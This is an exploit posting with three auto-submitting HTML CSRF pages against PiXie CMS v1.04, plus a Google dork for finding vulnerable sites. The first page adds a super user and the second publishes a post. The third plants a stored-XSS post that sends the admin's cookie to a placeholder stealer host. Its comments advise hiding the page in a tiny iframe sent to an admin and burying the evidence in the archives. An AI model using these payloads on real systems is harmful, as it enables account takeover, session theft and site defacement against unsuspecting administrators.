Add Super User:

<html>
<!--
# Exploit Title: PiXie CMS v1.04 <= CSRF Add Super User
# Google Dork: allintext: "Pixie Powered"
# Date: 28/12/2010
# Author: Ali Raheem (AKA wolfmankurd)
# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip
# Version: <=1.04
# Tested on: Linux sheevaplug-debian 2.6.32-00007-g56678ec #1 PREEMPT Mon Feb 8 03:49:55 PST 2010 armv5tel GNU/Linux

Note: replace SITEANDPATH with the site and path of the Pixie install,
USERNAME with a username (no spaces),
REALNAME with a name,
EMAIL with a valid email address; the login details for the new account are sent to it.
-->
<head></head>
<body onload='document.pwn.submit()'>
<form accept-charset="UTF-8" action="http://SITEANDPATH/admin/?s=settings&x=users" method="post" class="form" name="pwn">
  <input type="hidden" name="uname" id="uname" value="USERNAME"/>       <!-- No spaces! -->
  <input type="hidden" name="realname" id="realname" value="REALNAME"/>
  <input type="hidden" name="email" id="email" value="EMAIL"/>          <!-- needs to be valid -->
  <input type="hidden" name="user_new" value="Save"/>
  <input type="hidden" name="privilege" value="2"/>
</form>
</body>
</html>
Add Post:

<html>
<!--
# Exploit Title: PiXie CMS v1.04 <= CSRF Add Post
# Google Dork: allintext: "Pixie Powered"
# Date: 28/12/2010
# Author: Ali Raheem (AKA wolfmankurd)
# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip
# Version: <=1.04
# Tested on: Linux sheevaplug-debian 2.6.32-00007-g56678ec #1 PREEMPT Mon Feb 8 03:49:55 PST 2010 armv5tel GNU/Linux
# Note: Replace SITE_AND_PATH.

Have a look at the form and set title, content, tags and author to whatever you want.
-->
<head></head>
<body onload='document.pwn.submit()'>
<form accept-charset="UTF-8" action="http://SITE_AND_PATH/admin/?s=publish&m=dynamic&x=blog&page=1" method="post" name="pwn" id="form_addedit" class="form">
  <input type="hidden" name="table_name" value="pixie_dynamic_posts"/>
  <input type="hidden" class="form_text" name="post_id" value="" maxlength="11"/>
  <input type="hidden" class="form_text" name="page_id" value="3" maxlength="11"/>
  <input type="hidden" id="date" name="day" value="28"/>
  <input type="hidden" name="month" value="12"/>
  <input type="hidden" name="year" value="2010"/>
  <input type="hidden" class="form_text" name="time" value="16:06" size="5" maxlength="5"/>
  <input type="hidden" class="form_text" name="title" id="title" value="PwnT"/>
  <input type="hidden" name="content" id="content" value="PwnT by CSRF"/>
  <input type="hidden" class="form_text" name="tags" id="tags" value="Hack"/>
  <input type="hidden" name="public" id="public" value="yes"/>
  <input type="hidden" name="comments" id="comments" value="yes"/>
  <input type="hidden" class="form_text" name="author" value="AUTHOR" maxlength="64"/>
  <input type="hidden" class="form_text" name="last_modified" value="20101228160628"/>
  <input type="hidden" class="form_text" name="post_views" value="" maxlength="99"/>
  <input type="hidden" class="form_text" name="post_slug" value="" maxlength="255"/>
  <input type="hidden" name="submit_new" class="submit" value="Save"/>
</form>
</body>
</html>

Cookie steal:

<html>
<!--
# Exploit Title: PiXie CMS v1.04 CSRF to hidden cookie steal
Needs to be modified for clean URLs (the redirect below assumes the default ?s=blog&m=permalink&x= permalink form).
Place this on your server and replace SITE_AND_PATH with the location of the Pixie CMS.
Then point COOKIE_STEALER_SITE at a cookie stealer. I've called it log.php, and it GETs and then logs the data variable (https://github.com/Spyware/The-Toolkit/blob/master/recon/multi/cookie-stealer/log.php works), along with a writable log file called log.
Now include this in a secret (make it small and hidden) iframe in a link and send it to an Admin.

How this works: the little iframe first causes the admin to secretly post a new blog article (dated in the year 2000 so it won't be on the front page; maybe even make it non-public). Then it redirects him to that article, and the article's content steals his cookie. We can do this because of predictable permalinks: a post titled "__stealer" is reachable at ?s=blog&m=permalink&x=__stealer, so the redirect target is known before the post exists.
All this happens in seconds in a possibly hidden iframe. The only evidence? It will be in his latest actions log and the blog post (which will hopefully be hidden deep in the archives).

Caveat: starting a second navigation (the location assignment) in the same onload handler that called submit() can cancel the pending form POST in current browsers. Submitting the form into a hidden iframe and redirecting from that iframe's load event is the more reliable ordering.
-->
<head></head>
<body onload='document.pwn.submit();location="http://SITE_AND_PATH/?s=blog&m=permalink&x=__stealer"'>
<form accept-charset="UTF-8" action="http://SITE_AND_PATH/admin/?s=publish&m=dynamic&x=blog&page=1" method="post" name="pwn" id="form_addedit" class="form">
  <input type="hidden" name="table_name" value="pixie_dynamic_posts"/>
  <input type="hidden" class="form_text" name="post_id" value="" maxlength="11"/>
  <input type="hidden" class="form_text" name="page_id" value="3" maxlength="11"/>
  <input type="hidden" id="date" name="day" value="10"/>
  <input type="hidden" name="month" value="12"/>
  <input type="hidden" name="year" value="2000"/>
  <input type="hidden" class="form_text" name="time" value="16:06" size="5" maxlength="5"/>
  <input type="hidden" class="form_text" name="title" id="title" value="__stealer"/>
  <!-- Post body: an <img> whose src is set to the stealer URL with the admin's cookie appended; replace COOKIE_STEALER_SITE with the URL of your stealer -->
  <input type="hidden" name="content" id="content" value="<img src='' name='stealer'><script>document.stealer.src='COOKIE_STEALER_SITE/log.php?data='+document.cookie;</script>"/>
  <input type="hidden" class="form_text" name="tags" id="tags" value="Hack"/>
  <input type="hidden" name="public" id="public" value="yes"/>
  <input type="hidden" name="comments" id="comments" value="yes"/>
  <input type="hidden" class="form_text" name="author" value="AUTHOR" maxlength="64"/>
  <input type="hidden" class="form_text" name="last_modified" value="20101228160628"/>
  <input type="hidden" class="form_text" name="post_views" value="" maxlength="99"/>
  <input type="hidden" class="form_text" name="post_slug" value="" maxlength="255"/>
  <input type="hidden" name="submit_new" class="submit" value="Save"/>
</form>
</body>
</html>